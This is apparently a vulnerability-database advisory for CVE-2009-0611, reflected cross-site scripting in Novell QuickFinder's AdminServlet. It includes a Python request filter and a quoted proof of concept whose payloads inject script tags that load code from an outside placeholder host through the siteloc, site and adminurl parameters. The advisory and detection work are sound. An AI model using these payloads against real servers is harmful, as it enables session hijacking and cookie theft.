Novell Open Enterprise Server QuickFinder Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1117364  Vulnerability type: Cross-site scripting
Published: 2009-02-09  Updated: 2009-02-20
CVE ID: CVE-2009-0611  CNNVD-ID: CNNVD-200902-379
Affected platform: Novell  CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/32795
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-379
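|Vulnerability details
QuickFinder is the search server provided with Novell Open Enterprise Server; it can add search and print functionality to any World Wide Web site or intranet. QuickFinder returns the siteloc, site, adminurl and print-list parameters sent to qfsearch/AdminServlet to the user without validating them, which allows remote attackers to carry out cross-site scripting attacks by submitting malicious requests, resulting in arbitrary HTML and script code executing in the user's browser session.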
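
A request check for the four parameters named above, written for a reverse proxy or log-review script placed in front of the affected servlet. This is an added example, not Novell's code and not part of the advisory; the function name `suspicious_params` and the sample requests are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlsplit

ENDPOINT = "/qfsearch/AdminServlet"
# Parameters the advisory lists as echoed back without validation.
REFLECTED_PARAMS = {"siteloc", "site", "adminurl", "print-list"}
# Characters that close an HTML attribute value or open a new tag.
BREAKOUT_CHARS = set("\"'<>")


def suspicious_params(url, body=""):
    """Return the sorted advisory-listed parameter names whose decoded value
    contains markup-breaking characters ([] for clean or unrelated requests)."""
    parts = urlsplit(url)
    if parts.path.rstrip("/") != ENDPOINT:
        return []
    # parse_qsl percent-decodes once, so %22%3E and a literal "> look the same.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    hits = {
        name.lower()
        for name, value in pairs
        if name.lower() in REFLECTED_PARAMS and BREAKOUT_CHARS & set(value)
    }
    return sorted(hits)


# Constructed sample requests (URL, form body); example.invalid is a placeholder.
MARKUP = "%22%3E%3Cscript%20src=//example.invalid/x.js%3E%3C/script%3E"
SAMPLES = [
    ("https://server:2200/qfsearch/AdminServlet?&req=displayaddsite", "siteloc=" + MARKUP),
    ("https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties", ""),
    ("https://server:2200/qfsearch/AdminServlet?&req=global&adminurl=" + MARKUP, ""),
    ("https://server:2200/other/page?site=%3Cb%3E", ""),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(suspicious_params(url, body), url)
```

A filter like this only flags or blocks requests in front of the server; it does not replace encoding the values where they are written into the page.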
|Exploit (PoC)
source: http://www.securityfocus.com/bid/33708/info

Novell QuickFinder Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

"add virtual server"

https://server:2200/qfsearch/AdminServlet?&req=displayaddsite

Post:
siteloc=%22%3E%3Cscript%20src=http://www.example2.com/scripts/evil-code.js%3E%3C/script%3E

"Default"

Post:
https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties
site="><script 
src=http://www.www.example2.com/scripts/evil-code.js></script>

"services, synchronization"

Post:
https://server:2200/qfsearch/AdminServlet?&req=clusterserviceproperties
site="><script 
src=http://www.www.example2.com/scripts/evil-code.js></script>


Querystring:

https://server2200/qfsearch/AdminServlet?&req=global&adminurl="><script 
src=http://www.www.example2.com/scripts/evil-code.js></script>
|References

Source: XF
Name: quickfinderserver-multiple-xss(48619)
Link: http://xforce.iss.net/xforce/xfdb/48619
Source: SECTRACK
Name: 1021695
Link: http://www.securitytracker.com/id?1021695
Source: BID
Name: 33708
Link: http://www.securityfocus.com/bid/33708
Source: VUPEN
Name: ADV-2009-0421
Link: http://www.frsirt.com/english/advisories/2009/0421
Source: SECUNIA
Name: 33886
Link: http://secunia.com/advisories/33886
Source: MISC
Link: http://packetstormsecurity.org/0902-exploits/nqfs-xss.txt
Source: OSVDB
Name: 51941
Link: http://osvdb.org/51941